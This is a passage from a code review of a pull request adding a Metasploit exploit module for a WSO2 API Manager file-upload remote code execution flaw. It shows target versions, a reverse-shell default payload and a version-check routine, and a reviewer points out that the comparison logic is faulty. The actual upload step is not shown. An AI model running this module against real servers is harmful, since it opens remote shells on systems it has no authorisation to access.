modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

```diff
@@ -0,0 +1,416 @@
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/WSO2-2023-2988' ], # PoC
+          [ 'URL', 'https://blog.redwaysecurity.com/2024/11/wso2-4.2.0-remote-code-execution.html' ], # Writeup
+          [ 'URL', 'https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2988/' ]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'java/jsp_shell_reverse_tcp',
+          'SSL' => true,
+          'RPORT' => 9443
+        },
+        'Platform' => %w[linux],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic', {}
+          ],
+          [
+            'WSO2 API Manager (3.1.0 - 4.0.0)', {
+              'min_version' => '3.1.0',
+              'max_version' => '4.0.0',
+              'api_version' => 'v2'
+            },
+          ],
+          [
+            'WSO2 API Manager (4.1.0)', {
+              'min_version' => '4.1.0',
+              'max_version' => '4.1.9',
+              'api_version' => 'v3'
+            }
+          ],
+          [
+            'WSO2 API Manager (4.2.0)', {
+              'min_version' => '4.2.0',
+              'max_version' => '4.2.9',
+              'api_version' => 'v4'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-05-31',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Relative URI of WSO2 API manager', '/']),
+        OptString.new('HttpUsername', [true, 'WSO2 API manager username', 'admin']),
+        OptString.new('HttpPassword', [true, 'WSO2 API manager password', ''])
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Checking target...')
+
+    authenticate
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/services', '/Version'),
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+
+    return Exploit::CheckCode::Unknown unless res&.code == 200 && res&.headers&.[]('Server') =~ /WSO2/
+
+    xml = res.get_xml_document
+    xml.at_xpath('//return').text.match(/WSO2 API Manager-((?:\d\.){2}(?:\d))$/)
+    version = Rex::Version.new ::Regexp.last_match(1)
+
+    return CheckCode::Safe('Unable to determine version') unless version
+
+    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless
+       version <= Rex::Version.new('4.2.0') ||
+       version <= Rex::Version.new('4.1.0') ||
+       version <= Rex::Version.new('4.0.0') ||
+       version <= Rex::Version.new('3.2.0') ||
+       version <= Rex::Version.new('3.1.0')
```

Comment:
I don't think this is working, as it'll return `CheckCode::Safe` for any version above 4.2.0. You migjt want to use `version.between?(…)` instead.